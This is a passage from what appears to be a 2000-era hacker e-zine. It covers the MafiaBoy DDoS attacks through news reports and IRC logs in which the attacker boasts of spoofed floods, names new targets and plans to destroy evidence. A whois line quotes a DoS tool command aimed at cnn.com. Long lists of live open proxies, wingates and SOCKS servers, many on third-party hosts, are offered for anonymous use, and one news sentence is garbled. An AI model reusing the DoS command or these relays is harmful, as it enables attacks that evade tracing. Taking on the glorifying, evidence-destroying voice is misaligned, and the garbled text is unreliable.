     security of our Web site, EPA said. The decision to temporarily close 
     access to the Web site was made after a meeting Wednesday with computer 
     security experts, the agency said. The experts told EPA officials that 
     recent public attention on the agencys potential computer vulnerabilities 
     made the site a likely target for hackers. Wednesday, House Commerce 
     Committee Chairman Thomas Bliley, a Virginia Republican, released a letter 
     from GAO officials dated late last year on the serious threat to 
     sensitive information on EPA computers. GAO told Bliley that hackers could 
     possibly enter EPAs computer systems via the Web site, unless new fire 
     walls were created. Bliley called for the site to be taken down and 
     Thursday said the EPA acted appropriately to protect sensitive and 
     confidential information on its systems. It is unfortunate that the 
     American people temporarily will not have access to the important public 
     information contained on the EPA Web site, Bliley said in a statement. 
     That sad fact is the fault of no one other than EPA Administrator Carol 
     Browner and her management team. Had they heeded seven years of warnings by 
     security experts and performed their duties with even a modicum of 
     responsibility over this time, last nights shutdown would not have been 
     necessary, he said. EPA spokesman Dave Cohen said the agency was 
     saddened by having to take the Web site down, noting it is a popular 
     outlet for the public to access all types of information on air and water 
     pollution in local communities. We were afraid it had become a real 
     target, Cohen said.    
     
     
     Additional info from Vetesgirl
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     01/19/2000

     For those Defending MafiaBoy   by VetesGirl
     Mafiaboy is the one who got himself busted, so stop msg'ing me
     with your lame shit. 1. Mafiaboy is the one who got on EFNET and
     boasted to everyone that he was the one behind the attacks and put
     on DoS shows to show how elite he was, he sat in #!tnt boasting
     how elite he was and how the FEDS were fools.  Supposedly while
     being watched by the FEDS he telnet'd to hacked shells, continued
     to DoS and continued blowing off.  Mafiaboy is a DUMB FUQ and
     now has the Fame he wanted for so long.  I wonder if he is thinking
     the FEDS are fools now, and I also wonder who he is flippin on. A
     few of us on efnet got a kick out of whoever bot'd his nick.
     +---------------------------------------
     | mafiaboy <~guest@www.oaklandathletics.com> (Internic Commercial)
      ircname  / ./slice 0 cnn.com 22 80
      server   / irc.mcs.net ([192.160.127.97] MCSNet Services -
     (312)803-MCS1)
     +--------------------------------------------------
     
      
     @HWA
     
04.1 The MafiaBoy IRC logs
     ~~~~~~~~~~~~~~~~~~~~~
     
     A glimpse into the goings on and mindset of MafiaBoy accused copy cat
     DDoS perpertrator of recent major massive DDoS strikes on well known
     web sites. - Ed
     
     
     
     Source: Mshadow
     
     Rants:
     ~~~~~
     
     [12-Feb:12:48 anon] t3 to show them that they are dumb fucks with billions of dollars
     [12-Feb:12:48 databurn:#infinity] be all scared
     [12-Feb:12:48 databurn:#infinity] and pussies
     [12-Feb:12:48 anon] that cant even get proper admins
     [12-Feb:12:48 anon] he should
     [ Whois anon!~anonymous@Jupiter.mcs.net ]
       : ircname  : $null
       : channels : #!tnt @#%# 
       : server   : irc.mcs.net ([192.160.127.97] MCSNet Services - (312)803-MCS1)
     [12-Feb:12:48 anon] notify the fucking owner
     [12-Feb:12:48 anon] to put more filters
     
     
     Rants #2
     ~~~~~~~~
     
     FYI: anon in these logs is MafiaBoy
     
     
     Session Start: Sat Feb 12 12:45:40 2000
     [12:45] *** Now talking in #!tnt
     [12:45] <[T3]> hahahhaha
     [12:45] <anon> SNIFF ME FBI!!
     [12:46] <Mshadow> Interactive news
     [12:46] <Mshadow> :\
     [12:46] <Mshadow> you packet something
     [12:46] <Mshadow> it goes on tv
     [12:46] <anon> t3
     [12:46] <anon> can u connect to dell?
     [12:46] <anon> some people say yes
     [12:46] <anon> some say no
     [12:46] <[T3]> i can't browse the web
     [12:47] <anon> fool's dont know what a cache is
     [12:47] <anon> telnet to it port 80
     [12:47] <[T3]> period, my modem is totally fucked
     [12:47] <[T3]> everything times out
     [12:47] <[T3]> uh no thanks
     [12:47] <anon> and GET /m
     [12:47] <swinger-> anon. it lods but like slowly
     [12:47] <swinger-> heh now its reallly lagged
     [12:48] <Mshadow> Are you just hitting it with a stream attack?
     [12:48] <anon> mshadow
     [12:48] <anon> no
     [12:48] <anon> my personal attack
     [12:49] <Mshadow> hehe
     [12:49] <Mshadow> What kinda packets?
     [12:49] <anon> which is spoofed ++
     [12:49] <anon> its sorta a mix
     [12:49] <anon> a new type
     [12:49] <anon> and syn
     [12:49] <[T3]> spoofed++, lol
     [12:49] <[T3]> it's either spoofed or not spoofed
     [12:49] <[T3]> there is no "elite" spoof
     [12:50] <[T3]> but
     [12:50] <[T3]> i think there's methods to trace spoofed packets
     [12:50] <Mshadow> Yea
     [12:50] <[T3]> if you catch it while it's flooding
     [12:50] <Mshadow> they have go router to router
     [12:50] <Mshadow> to trace the packets back
     [12:50] <Mshadow> only takes like 20 min
     [12:53] <[T3]> mafiaboy
     [12:53] <[T3]> so who's next
     [12:53] <[T3]> after dell
     [12:53] <Mshadow> You know wait till they talk about it on msnbc
     [12:53] <swinger-> ms
     [12:53] <swinger-> should be next
     [12:53] <Mshadow> and drop the chat server
     [12:53] <Mshadow> :\
     [12:53] <[T3]> lol
     [12:54] <anon> t3
     [12:54] <anon> tonight
     [12:54] <anon> i put this computer
     [12:54] <anon> in the fireplace
     [12:54] <swinger-> heh
     [12:54] <Mshadow> haha
     [12:54] <anon> i aint joking 
     anon is ~anonymous@Jupiter.mcs.net * $null
     anon on #!tnt 
     anon using irc.mcs.net [192.160.127.97] MCSNet Services - (312)803-MCS1
     anon End of /WHOIS list.
     [12:55] <Mshadow> why don't you just take out the hd
     [12:55] <Mshadow> and kill that
     [12:55] <Mshadow> tehn put a new one in
     [12:55] <Mshadow> :\
     [12:55] <anon> mshadow
     [12:55] <anon> i dont want to take ANY chances
     [12:55] <Mshadow> really and talking on irc is not a chance?
     [12:55] <anon> what can irc prove
     [12:55] <anon> i can be bluffing 
     [12:57] <[T3]> mafia
     [12:57] <anon> uhmm
     [12:57] <anon> fuck it
     [12:57] <anon> fuck the fire place
     [12:57] <anon> sledge hammer
     [12:57] <anon> instead
     [12:57] <[T3]> it's spoofed++
     [12:57] <[T3]> they can't catch you :\
     [12:57] <anon> t3 dont give a fuck
     [12:57] <Mshadow> haha
     [12:57] <[T3]> heh
     [12:57] <anon> dont take chances
     [12:57] <Mshadow> t3 you should make a tcl that spoffs ++
     [12:57] <Mshadow> spoofs 
     [12:57] <[T3]> aren't you going to go out with a bang at least?
     [12:58] <anon> yes
     [12:58] <Mshadow> Drop like 10 core routers :\
     [12:58] <[T3]> hahahha
     [12:58] <anon> no
     [12:58] <[T3]> what are you gonna do
     [12:58] <anon> micrsoft
     [12:58] <anon> microsoft will be gone for a few weeks
     [12:58] <[T3]> HAHAHAHAHHAHAHAHHAHAHAHAHH
     [12:58] <Mshadow> haha
     [12:58] <[T3]> oh man
     [12:58] <[T3]> that's evil
     [12:59] <anon> MAYBE
     [12:59] <anon> i m thinking something big
     [12:59] <anon> maybe
     [12:59] <anon> www.nasa.gov
     [12:59] <[T3]> i need to get away from you before i get busted for being an accomplice or some shit
     [12:59] <anon> or www.whitehouse.gov
     [12:59] <anon> maybe im just bluffing
     [12:59] <[T3]> they can always change ip's, ya know
     [12:59] <anon> and i wont do shit
     [12:59] <anon> who knows
     [12:59] <anon> t3 "hit the router"
     [12:59] <[T3]> you have to use some sort of resolving technique
     [12:59] <anon> i mean
     [12:59] <anon> mDoS
     [12:59] <[T3]> they can change the ip of the router too
     [12:59] <anon> the whole router list
     [13:00] <anon> i know what im doing
     [13:00] <anon> yahoo.com
     [13:00] <[T3]> haha
     [13:00] <anon> does that ip changing shit too
     [13:00] <[T3]> so mafiaboy, it was really you that hit ALL those ones in the news?
     [13:00] <anon> u just pin em so hard they cant even redirect
     [13:00] <[T3]> buy.com, etrade, ebay
     [13:00] <anon> t3 maybe
     [13:00] <[T3]> all that shit?
     [13:00] <anon> who knows
     [13:00] <[T3]> haha
     [13:00] <anon> would only awnser
     [13:00] <anon> that under ssh2
     [13:01] <anon> i might
     [13:01] <anon> pmg the hd
     [13:01] <anon> and sledge hammer
     [13:01] <anon> and through it in a lake
     [13:01] <[T3]> they say that you're costing them millions of dollars
     [13:01] <anon> surprised
     [13:01] <anon> i didnt even get raided yet
     [13:02] <anon> t3 : they are fools
     [13:02] <anon> maybe
     [13:02] <[T3]> i don't think this has anything to do with being a "fool"
     [13:02] <anon> i might hit
     [13:02] <swinger-> amazon.com st0ck!
     [13:02] <[T3]> maybe those that coded tcp/ip are fools
     [13:02] <anon> every efnet hub
     [13:02] <anon> for weeks
     [13:02] <[T3]> or cisco
     [13:02] <[T3]> fuck efnet
     [13:03] <[T3]> efnet doesn't make the news
     [13:03] <swinger-> i know
     [13:03] *** Disconnected
     Session Close: Sat Feb 12 13:03:08 2000
     
     @HWA
     
04.2  Mounties Know Mafiaboy
      ~~~~~~~~~~~~~~~~~~~~~~

      Contributed by SugarKing

      Source: Computer Currents
      url: http://www.currents.net/newstoday/00/02/18/news5.html
      
      
      The Royal Canadian Mounted Police (RCMP) reportedly knows the name of a Canadian 
      teenager going by the online handle mafiaboy, who has been fingered as one of 
      several possible perpetrators of a series of Distributed Denial of Service 
      (DDoS) attacks on several major US and Canadian Web sites last week.
      
      Several news reports today indicate that the RCMP served a warrant on Look 
      Communications Inc.'s Montreal office last Tuesday that sought information the 
      Internet service provider (ISP) had on a former customer using the online 
      identity mafiaboy. Look operates Internet .2-887-1420/WIRES ONLINE, 
      BUSINESS/)er, ytes.com .on Web site at to which mafiaboy had reportedly been a 
      subscriber. Delphi is said to have terminated the connection in 1998 following 
      abuse of service allegations.
      
      The Toronto Globe & Mail newspaper quotes a company official as saying, "We have 
      turned the information over to the police, it's now in their hands."
      
      RCMP spokesman Corporal Stphane Bonin would not confirm the report, the 
      newspaper said, and referred questions to the FBI, which is said to be leading 
      the investigation into the massive "smurf" attacks which brought down such major 
      sites as eBay, Amazon and CNN. But, FBI spokeswoman Debbie Weierman would not 
      say whether any suspects have yet been identified, the report said.
      
      FBI Director Louis Freeh has reportedly said the bureau's investigation has now 
      broadened to include Canada, Germany and several other countries, and that 
      agents were working on "fast-developing leads."
      
      News reports have stated that police in Canada and the US are focussing on 
      several hackers, including mafiaboy, Coolio and Nachoman, who have claimed 
      responsibility for recent acts of vandalism.
      
      A Look official refused to divulge information on mafiaboy but said the data 
      turned over to the RCMP contained the user's name, address, and telephone and 
      credit card numbers, according to news reports today.
      
      The Globe & Mail also reported that experts have said that mafiaboy's newfound 
      notoriety has apparently spawned a rash of copycats using the same pseudonym, 
      and added that a computer specialist was able to quickly locate the Web site 
      addresses for 73 users worldwide, including at least four in Canada, who were 
      using the mafiaboy handle as of Wednesday.
      
      @HWA


     
 
           
     
     
05.0 Updated proxies and wingates...from irc4all and elsewhere
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     http://www.lightspeed.de/irc4all/
     
     Usual source, plus some snarfed from Vetesgirl's site self-evident.com (at end)
     
     Lightspeed list Feb 18th
     ~~~~~~~~~~~~~~~~~~~~~~~~
     
     
     NotFound,200.37.242.4, 
     NotFound,200.241.64.130, 
     NotFound,200.37.242.5, 
     mccabe.lnk.telstra.net,139.130.59.187, 
     router.kbs.com.kw,168.187.79.97, 
     OfficeCOM-EUnet.AT.EU.net,193.80.63.42, 
     jovellanos.com,194.224.183.221, 
     igic.bas-net.by,194.85.255.49, 
     gaon.zg.szczecin.pl,195.116.25.98, 
     md.cl.balt.net,195.14.162.221, 
     ibp.santa.krs.ru,195.161.57.133, 
     www.zyvs.lviv.net,195.5.34.99, 
     mail.medikona.lt,195.14.162.220, 
     petrozavodsk.karelia.ru,195.161.9.226, 
     C824154A.podernet.com.mx,200.36.21.74, 
     internet-server.ebf.com.br,200.231.27.1, 
     cas.cecosami.com.pe,200.37.242.3, 
     NotFound,206.103.12.131, 
     m105.clic-in.com.br,200.231.28.15, 
     ad202.166.33.67.magix.com.sg,202.166.33.67, 
     NotFound,206.112.35.146, 
     c111.h202052116.is.net.tw,202.52.116.111, 
     ad202.166.34.39.magix.com.sg,202.166.34.39, 
     nor24788-1.gw.connect.com.au,202.21.13.46, 
     relectronic.ozemail.com.au,203.108.38.61, 
     mail.clintrak.com,206.112.35.178, 
     proxy1.israeloff.com,206.112.35.156, 
     NotFound,210.154.48.188, 
     NotFound,210.56.18.228, 
     port58151.btl.net,206.153.58.151, 
     207-246-74-54.xdsl.qx.net,207.246.74.54, 
     adsl-209-182-168-236.value.net,209.182.168.236, 
     billymchales.com,209.20.195.10, 
     www.onlyoneht.co.jp,210.170.93.66, 
     ns.isd-japan.co.jp,210.161.71.114, 
     ns.wings.co.jp,210.168.241.106, 
     dns1.ctsjp.co.jp,210.172.87.146, 
     dns.rikcad.co.jp,210.170.89.210, 
     dns.hokuto.ed.jp,210.233.0.34, 
     ftp.sdi.kiev.ua,212.68.162.17, 
     morris.ocs.k12.al.us,216.77.56.74, 
     jeter.ocs.k12.al.us,216.77.56.98, 
     wforest.ocs.k12.al.us,216.77.56.82, 
     cr216724718.cable.net.co,216.72.47.18, 
     carver.ocs.k12.al.us,216.77.56.114, 
     oms.ocs.k12.al.us,216.77.56.106, 
     ohs.ocs.k12.al.us,216.77.56.122, 
     south.ocs.k12.al.us,216.77.56.90, 
     north.ocs.k12.al.us,216.77.56.66, 
     165-246.tr.cgocable.ca,24.226.165.246, 
     
     
     WINGATES
     ~~~~~~~~
     NotFound,194.243.99.162, 
     NotFound,195.112.199.130, 
     NotFound,210.161.200.82, 
     NotFound,194.204.208.86, 
     NotFound,206.103.12.131, 
     NotFound,210.56.18.228, 
     52-061.al.cgocable.ca,205.237.52.61, 
     adsl-209-182-168-236.value.net,209.182.168.236, 
     fsv.elnet.lt,193.219.6.254, 
     dns.hokuto.ed.jp,210.233.0.34, 
     dns1.ctsjp.co.jp,210.172.87.146, 
     ad202.166.33.67.magix.com.sg,202.166.33.67, 
     adsl-209-182-168-188.value.net,209.182.168.188, 
     ad202.166.34.39.magix.com.sg,202.166.34.39, 
     cr216724718.cable.net.co,216.72.47.18, 
     billymchales.com,209.20.195.10, 
     router.kbs.com.kw,168.187.79.97, 
     burnem.lnk.telstra.net,139.130.54.178, 
     mccabe.lnk.telstra.net,139.130.59.187, 
     altona.lnk.telstra.net,139.130.80.123, 
     dns.rikcad.co.jp,210.170.89.210, 
     207-246-74-54.xdsl.qx.net,207.246.74.54, 
     edtn002050.hs.telusplanet.net,161.184.144.18, 
     port58151.btl.net,206.153.58.151, 
     rnpbn.microdata.ro,195.179.246.130, 
     wingate.shokoren.or.jp,210.145.221.99, 
     165-246.tr.cgocable.ca,24.226.165.246, 
     fao.cs.msu.su,158.250.10.200, 
     slava.krascience.rssi.ru,193.232.19.90, 
                                                                       
                                                                       
     (C) Paradox
                                                                                                                                                                             
                                                                                                                                                                             
     Socks Proxies
     ~~~~~~~~~~~~~
     
     
     - Updated 02/12/2000 -
     
     Now a new update, please send me some socks to keep this page alive. 
     Programms to scan your own socks are on the files page. 

     Your Paradox@CyberJunkie.com

     Sometimes are the socks-servers on this page a little bit busy, so try 
     again later or use the telnet-gates 
     
     SOCKS 4 (Port 1080)
     ~~~~~~~~~~~~~~~~~~~
     
     NotFound,12.2.81.50, 
     NotFound,194.243.99.199, 
     NotFound,194.243.99.162, 
     NotFound,194.204.206.160, 
     NotFound,194.204.204.137, 
     NotFound,194.186.180.100, 
     NotFound,194.149.137.11, 
     mail.ermanco.com,12.2.82.130, 
     NotFound,195.14.162.221, 
     NotFound,195.14.162.220, 
     proxy.indussoft.com,12.26.8.18, 
     theleu.lnk.telstra.net,139.130.74.160, 
     noeljo9.lnk.telstra.net,139.130.54.153, 
     altona.lnk.telstra.net,139.130.80.123, 
     patter.lnk.telstra.net,139.130.81.160, 
     mccabe.lnk.telstra.net,139.130.59.187, 
     edtn002050.hs.telusplanet.net,161.184.144.18, 
     NotFound,195.5.59.227, 
     igic.bas-net.by,194.85.255.49, 
     NotFound,195.178.196.250, 
     NotFound,195.178.196.251, 
     jovellanos.com,194.224.183.221, 
     NotFound,195.42.150.132, 
     NotFound,200.36.19.225, 
     rnpbn.microdata.ro,195.179.246.130, 
     ns.ukrnafta.ukrtel.net,195.5.22.193, 
     server3.italcontainer.it,195.135.39.189, 
     news.ukrnafta.ukrtel.net,195.5.22.196, 
     comm.atv.volga.ru,195.144.196.129, 
     www.ukrnafta.ukrtel.net,195.5.22.195, 
     mail.theova.com,195.14.148.65, 
     p107.nas2.is3.u-net.net,195.102.196.235, 
     NotFound,203.21.16.182, 
     limedika.balt.net,195.14.161.169, 
     NotFound,203.116.5.58, 
     C824154A.podernet.com.mx,200.36.21.74, 
     internet-server.ebf.com.br,200.231.27.1, 
     t2s187.data.net.mx,200.13.19.196, 
     dns-server1.tj.pa.gov.br,200.242.244.1, 
     cas.cecosami.com.pe,200.37.242.3, 
     pcse.essalud.sld.pe,200.37.132.130, 
     m105.clic-in.com.br,200.231.28.15, 
     ad202.166.34.39.magix.com.sg,202.166.34.39, 
     c111.h202052116.is.net.tw,202.52.116.111, 
     nor24788-1.gw.connect.com.au,202.21.13.46, 
     ad202.166.33.67.magix.com.sg,202.166.33.67, 
     sripenanti01-kmr.tm.net.my,202.188.62.6, 
     ad202.166.38.229.magix.com.sg,202.166.38.229, 
     BlackBox01.irg.com.au,203.21.16.201, 
     NotFound,206.103.12.131, 
     secure.hnlfleet.com.au,203.21.16.177, 
     relectronic.ozemail.com.au,203.108.38.61, 
     cipher.ruksun.com,204.94.124.135, 
     tconl9076.tconl.com,204.26.90.76, 
     52-012.al.cgocable.ca,205.237.52.12, 
     52-061.al.cgocable.ca,205.237.52.61, 
     NotFound,206.112.35.146, 
     jnet.vip.best.com,206.184.160.227, 
     NotFound,207.0.119.67, 
     NotFound,209.166.180.19, 
     dsl-148-146.tstonramp.com,206.55.148.146, 
     proxy.imojo.net,206.112.35.222, 
     mail.clintrak.com,206.112.35.178, 
     NotFound,210.237.181.226, 
     proxy1.israeloff.com,206.112.35.156, 
     sai0103.erols.com,207.96.118.243, 
     ch-angrignon.qc.ca,207.236.200.66, 
     207-246-74-54.xdsl.qx.net,207.246.74.54, 
     ae2.lightlink.com,207.127.235.190, 
     122-94.w3.com.uy,207.3.122.94, 
     admin.chestnut.org,208.16.57.40, 
     brsh4.carol.net,208.128.229.100, 
     brsh2.carol.net,208.128.229.98, 
     adsl-209-182-168-236.value.net,209.182.168.236, 
     ip48.gte5.rb1.bel.nwlink.com,209.20.218.48, 
     NotFound,210.56.18.228, 
     smtp.netcarrier.net,209.140.172.6, 
     martinselig.com,209.20.156.130, 
     billymchales.com,209.20.195.10, 
     ns.ticketport.co.jp,210.160.142.82, 
     ipshome-gw.iwahashi.co.jp,210.164.242.146, 
     wingate.shokoren.or.jp,210.145.221.99, 
     ns.isd-japan.co.jp,210.161.71.114, 
     NotFound,212.205.26.80, 
     NotFound,212.47.11.130, 
     ns.wings.co.jp,210.168.241.106, 
     NotFound,212.22.69.35, 
     NotFound,212.68.162.183, 
     jp-gw.jprint.co.jp,210.164.234.2, 
     sanpx1.san.town.sonobe.kyoto.jp,210.160.246.9, 
     dns.rikcad.co.jp,210.170.89.210, 
     dns.hokuto.ed.jp,210.233.0.34, 
     NotFound,212.68.162.177, 
     dns1.ctsjp.co.jp,210.172.87.146, 
     NotFound,216.72.45.152, 
     ftp.eclectica.net,212.210.32.228, 
     ns.terna.ru,212.188.26.67, 
     mail.trutnov.cz,212.27.207.8, 
     ftp.sdi.kiev.ua,212.68.162.17, 
     zskom.vol.cz,212.27.207.7, 
     www.chania-cci.gr,212.205.27.194, 
     www.sos.iqnet.cz,212.71.157.102, 
     cr216724718.cable.net.co,216.72.47.18, 
     216-59-38-142.usa.flashcom.net,216.59.38.142, 
     symbolics.org,216.103.122.180, 
     216-59-40-72.usa.flashcom.net,216.59.40.72, 
     mail.savvyuser.net,216.103.122.178, 
     cr216724724.cable.net.co,216.72.47.24, 
     www.cassvillesd.k12.wi.us,216.56.42.3, 
     www.dyvic.com,24.92.249.251, 
     164-100.tr.cgocable.ca,24.226.164.100, 
     nic-c40-143.mw.mediaone.net,24.131.40.143, 
     nic-c46-209.mw.mediaone.net,24.131.46.209, 
     modemcable161.21-200-24.timi.mc.videotron.net,24.200.21.161, 
     modemcable118.21-200-24.timi.mc.videotron.net,24.200.21.118, 
     x1-6-00-60-b0-66-08-f7.cust.planetcable.net,24.137.18.44, 
     nic-c42-068.mw.mediaone.net,24.131.42.68, 
     adsl-63-196-81-8.dsl.sndg02.pacbell.net,63.196.81.8,
     
     
     SOCKS 5 (Port 1080)
     ~~~~~~~~~~~~~~~~~~~
     
     NotFound,168.187.78.34, 
     NotFound,194.243.99.162, 
     NotFound,194.243.99.199, 
     chester.chesterschooldistrict.com,12.6.236.250, 
     NotFound,194.186.180.100, 
     NotFound,194.226.183.34, 
     NotFound,200.37.242.4, 
     NotFound,200.241.64.130, 
     NotFound,200.37.242.5, 
     mccabe.lnk.telstra.net,139.130.59.187, 
     router.kbs.com.kw,168.187.79.97, 
     OfficeCOM-EUnet.AT.EU.net,193.80.63.42, 
     jovellanos.com,194.224.183.221, 
     igic.bas-net.by,194.85.255.49, 
     gaon.zg.szczecin.pl,195.116.25.98, 
     md.cl.balt.net,195.14.162.221, 
     ibp.santa.krs.ru,195.161.57.133, 
     www.zyvs.lviv.net,195.5.34.99, 
     mail.medikona.lt,195.14.162.220, 
     petrozavodsk.karelia.ru,195.161.9.226, 
     C824154A.podernet.com.mx,200.36.21.74, 
     internet-server.ebf.com.br,200.231.27.1, 
     cas.cecosami.com.pe,200.37.242.3, 
     NotFound,206.103.12.131, 
     m105.clic-in.com.br,200.231.28.15, 
     ad202.166.33.67.magix.com.sg,202.166.33.67, 
     NotFound,206.112.35.146, 
     c111.h202052116.is.net.tw,202.52.116.111, 
     ad202.166.34.39.magix.com.sg,202.166.34.39, 
     nor24788-1.gw.connect.com.au,202.21.13.46, 
     relectronic.ozemail.com.au,203.108.38.61, 
     mail.clintrak.com,206.112.35.178, 
     proxy1.israeloff.com,206.112.35.156, 
     NotFound,210.154.48.188, 
     NotFound,210.56.18.228, 
     port58151.btl.net,206.153.58.151, 
     207-246-74-54.xdsl.qx.net,207.246.74.54, 
     adsl-209-182-168-236.value.net,209.182.168.236, 
     billymchales.com,209.20.195.10, 
     www.onlyoneht.co.jp,210.170.93.66, 
     ns.isd-japan.co.jp,210.161.71.114, 
     ns.wings.co.jp,210.168.241.106, 
     dns1.ctsjp.co.jp,210.172.87.146, 
     dns.rikcad.co.jp,210.170.89.210, 
     dns.hokuto.ed.jp,210.233.0.34, 
     ftp.sdi.kiev.ua,212.68.162.17, 
     morris.ocs.k12.al.us,216.77.56.74, 
     jeter.ocs.k12.al.us,216.77.56.98, 
     wforest.ocs.k12.al.us,216.77.56.82, 
     cr216724718.cable.net.co,216.72.47.18, 
     carver.ocs.k12.al.us,216.77.56.114, 
     oms.ocs.k12.al.us,216.77.56.106, 
     ohs.ocs.k12.al.us,216.77.56.122, 
     south.ocs.k12.al.us,216.77.56.90, 
     north.ocs.k12.al.us,216.77.56.66, 
     165-246.tr.cgocable.ca,24.226.165.246,
     
     
     WINGATES
     ~~~~~~~~
     NotFound,194.243.99.162, 
     NotFound,195.112.199.130, 
     NotFound,210.161.200.82, 
     NotFound,194.204.208.86, 
     NotFound,206.103.12.131, 
     NotFound,210.56.18.228, 
     52-061.al.cgocable.ca,205.237.52.61, 
     adsl-209-182-168-236.value.net,209.182.168.236, 
     fsv.elnet.lt,193.219.6.254, 
     dns.hokuto.ed.jp,210.233.0.34, 
     dns1.ctsjp.co.jp,210.172.87.146, 
     ad202.166.33.67.magix.com.sg,202.166.33.67, 
     adsl-209-182-168-188.value.net,209.182.168.188, 
     ad202.166.34.39.magix.com.sg,202.166.34.39, 
     cr216724718.cable.net.co,216.72.47.18, 
     billymchales.com,209.20.195.10, 
     router.kbs.com.kw,168.187.79.97, 
     burnem.lnk.telstra.net,139.130.54.178, 
     mccabe.lnk.telstra.net,139.130.59.187, 
     altona.lnk.telstra.net,139.130.80.123, 
     dns.rikcad.co.jp,210.170.89.210, 
     207-246-74-54.xdsl.qx.net,207.246.74.54, 
     edtn002050.hs.telusplanet.net,161.184.144.18, 
     port58151.btl.net,206.153.58.151, 
     rnpbn.microdata.ro,195.179.246.130, 
     wingate.shokoren.or.jp,210.145.221.99, 
     165-246.tr.cgocable.ca,24.226.165.246, 
     fao.cs.msu.su,158.250.10.200, 
     slava.krascience.rssi.ru,193.232.19.90,
     
     EoF
     
     
     Check http://www.lightspeed.de/irc4all/ for MORE lists/updates.
     
     -=-
     
     Extra Stuff
     ~~~~~~~~~~~
     
     From Vetesgirl's site:
     
     http://www.polito.it/~montru/en-proxylist.html  see below
     http://www.cl.spb.ru/sparta/list.htm............NO DATA AVAILABLE
     http://plist.elan-ua.net........................Page thru data manually.
     http://proxys4all.cgi.net.......................general info.
     
     
     -=-
     
     
     Software/Scanners:
     ~~~~~~~~~~~~~~~~~~
     
     http://www.self-evident.com/exploits/proxy 
     
     EoF
     
     Following list retrieved: Friday evening late 10p-11p (EST) Feb 18th
     
     Source: http://www.polito.it/~montru/en-proxylist.html
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Updates: unknown
     
     Proxy server address     Port
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     sunsite.dsi.unimi.it     80
     wwwcache.doc.ic.ac.uk    3128
     proxy.telnetwork.it 
     -> 194.20.107.101        8080
     proxy.skylink.it         8080
     proxy.alpcom.it          1080
     www.iprolink.ch 
     -> 194.41.63.1           80
     193.45.68.17             80
     proxy.inet.it            8080
     
     EoF
     
     
     Lists compiled but NOT verified by C*:. - Ed
     
     
     @HWA
     
06.0  HNN:Feb 14:FBI Zeros in on Two Possible Suspects      
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      FBI Zeros in on Two Possible Suspects 


      contributed by evenprime 
      Agents for the FBI have identified two possible suspects
      in last week's massive denial of service attacks.
      Fox News 
      http://www.foxnews.com/vtech/0214/t_rt_0214_13.sml
      

      Stanford, UC Santa Barbara, UCLA, named as
      Possible Launch Sites
      Computers at Stanford, UC Santa Barbara, UCLA, and
      unidentified systems in Germany may have been used as
      possible launch sites for the massive denial of service
      attacks.
      Associated Press - via Yahoo 
      http://dailynews.yahoo.com/h/ap/20000212/tc/hacker_investigation_8.html
      

      Mixter Witch Hunt Begins
      The author of one of the tools that may have been used
      in the attack is wanted for questioning by NIPC. This
      after sources traced back one of the attacking
      machines to Germany. (Since Mixter lives in Germany he
      must be guilty, great logic.)
      CNN
      http://www.cnn.com/2000/TECH/computing/02/13/hacker.trail.01/index.html
      
      Reuters - via Excite
      http://news.excite.com/news/r/000213/10/net-tech-hackers
      
      C|Net 
      http://news.cnet.com/news/0-1005-200-1548566.html?dtn.head

      Attacks Have Little Impact on Shoppers
      Early feedback from Web merchants nailed by hackers
      this week suggests that high-profile denial-of-service
      attacks that struck Yahoo!, Amazon.com, eBay and
      others (including ZDNet) are having little impact on
      online shopping during the busy Valentine's Day period.
      ZD Net 
      http://www.zdnet.com/zdnn/stories/news/0,4586,2436696,00.html

      Questions Raised About NIPC Tools
      Some people have doubts about closed-source tools
      from NIPC to search for DDoS agents.
      ZD Net
      http://www.zdnet.com/zdnn/stories/news/0,4586,2437096,00.html
      
      
      FOX;
      
      Report: Investigators Focus on Two Known Hackers
      
      7:16 a.m. ET (1216 GMT) February 14, 2000
      
      NEW YORK   Federal agents investigating recent attacks on computers 
      that overwhelmed popular Web sites belonging to Yahoo! Inc. (YHOO.O)
      and Amazon.com Inc. (AMZN.O) are focusing on two known hackers, The 
      Wall Street Journal reported Monday.
      
      So far, the two potential suspects have been identified only their
      online pseudonyms, the newspaper said.
      
      Although many in the Internet security community initially described
      the attacks as unsophisticated, it now appears that at least one of 
      the attacker may have been far more skilled than the apparent 
      subsequent copy cats, David Brumley, a system-software developer in
      Stanford University's information-technology department told the 
      Journal
      
      
      The hacker, believed to be responsible for the Yahoo attack,
      the first of the assaults, mounted a complex operation using
      highly customized tools, Brumley told the Journal.
      
      Law enforcement officials told the Journal they haven't come
      up with hard suspects.
      
      
      Brumley said the hacker's online pseudonym is known, but he
      declined to reveal it citing concerns about jeopardizing the
      investigation, the Journal said.
      
      A second less skilled hacker is believed to live in Canada
      and was being watched as a possible copycat, Michael Lyle, chief
      technical officer of Internet security firm Recourse
      Technologies Inc. told the Journal.
      
      That hacker known online by pseudonym "mafiaboy.' allegedly
      was recorded in a Internet hacking channel soliciting orders to
      shut down Time Warner Inc.'s (TWX.N) Cable News Network and
      E-Trade Group Inc. (EGRP.O).
      
      -=-
      
      AP->Yahoo
     
      Saturday February 12 1:16 AM ET 
     
      Links in Computer Attacks Traced
     
      By TED BRIDIS Associated Press Writer 
     
      WASHINGTON (AP) - Experts investigating recent attacks against major 
      commercial Web sites say a computer and an Internet device used by vandals 
      as weapons have been traced to two California universities.

      The vandals used a desktop computer at the University of California, Santa 
      Barbara, and an Internet router - a device that can amplify data traffic - 
      from Stanford University, officials at both schools       acknowledged 
      Friday.

      There was no indication that anyone at either university was directly 
      involved, only that their equipment was used. Experts believe dozens of 
      computers nationwide were hacked and had electronic attack software 
      secretly installed.

      ``They've attacked us in a way that hurts what we do as a university, and 
      hurts all universities,'' said Robert Sugar, chairman of the information 
      technology board in Santa Barbara. The school's computer was believed used 
      in the       attack against CNN's Web site Tuesday.

      Stanford said one of its routers located at a remote wildlife preserve was 
      used to transmit some of the data aimed against the Web site of auction 
      operator eBay for about 30 minutes before engineers blocked hackers from 
      using it.

      ``It's really out in the middle of nowhere,'' said Dave Brumley, assistant 
      computer security officer at the university. He said engineers have 
      checked Stanford's other routers to prevent their similar misuse.

